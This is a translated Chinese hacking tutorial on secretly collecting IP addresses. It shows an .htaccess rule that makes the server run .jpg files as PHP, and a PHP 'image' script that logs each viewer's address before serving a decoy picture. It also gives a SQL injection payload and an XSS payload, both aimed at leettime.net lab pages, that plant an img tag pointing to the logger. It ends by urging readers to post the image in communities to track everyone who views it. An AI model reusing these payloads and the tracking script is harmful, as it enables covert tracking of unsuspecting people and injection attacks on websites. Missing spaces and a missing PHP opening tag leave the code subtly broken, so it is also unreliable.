在本教程中，我們將學(xué)習(xí)如何用一張照片來盜取ip地址。我的想法是通過修改.htaccess文件，將jpg文件當(dāng)作php文件來解析。

下面就是我們需要向.htaccess中添加的代碼：

AddHandlerapplication/x-httpd-php5.jpg

然后將下面的代碼復(fù)制到記事本中，命名為grabber.jpg

$fh=fopen('ip_list.txt','a');
fwrite($fh,$_SERVER['REMOTE_ADDR']."
");
fclose($fh);
$im=imagecreatefromjpeg("n00b.png");
header('Content-Type:image/jpeg');
imagejpeg($im);
imagedestroy($im);
?>

將grabber.jpg的權(quán)限設(shè)置為755，然后再找一張照片，將其命名為n00b.png，接著放到與grabber.jpg相同的目錄之中。

就這樣，一切工作就緒了。當(dāng)別人瀏覽grabber.jpg這張照片的時(shí)候，他的ip地址就會(huì)被記錄下來。

（譯者注：需要把這些東西上傳至我們的個(gè)人網(wǎng)站空間中）

POC：

(譯者注：作者這里貼了一張可獲取ip的演示照片，為了大家的隱私，我沒有將其貼出，讀者可自行去作者博客查看)

至此，我們的照片已經(jīng)可以開始工作了。

接著我還想說明一下如何使用SQLi來獲取ip地址。其實(shí)使用照片來盜取ip地址十分快捷，我們沒有理由去使用SQLi這種方法，但是為了讓讀者獲取到更多的知識(shí)，我還是說明一下吧：

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'unionselect1,0x3c696d67207372633d22687474703a2f2f6c65657474696d652e6e65742f6964696f74735f746573745f6c61622f696d61676569702f7472796d652e6a7067223e,3#

現(xiàn)在，再說一下如何使用xss來獲取ip地址：

http://leettime.net/xsslab1/chalg1.php?name=<imgsrc="http://leettime.net/idiots_test_lab/imageip/tryme.jpg">&submit=Search

好了，就是這些了。

我們可以用這個(gè)技巧做許多有趣的事情，事實(shí)上大部分社區(qū)都允許我們發(fā)布一些照片，所以我們可以用這個(gè)方法去獲取所有訪問到我們照片的人的ip地址。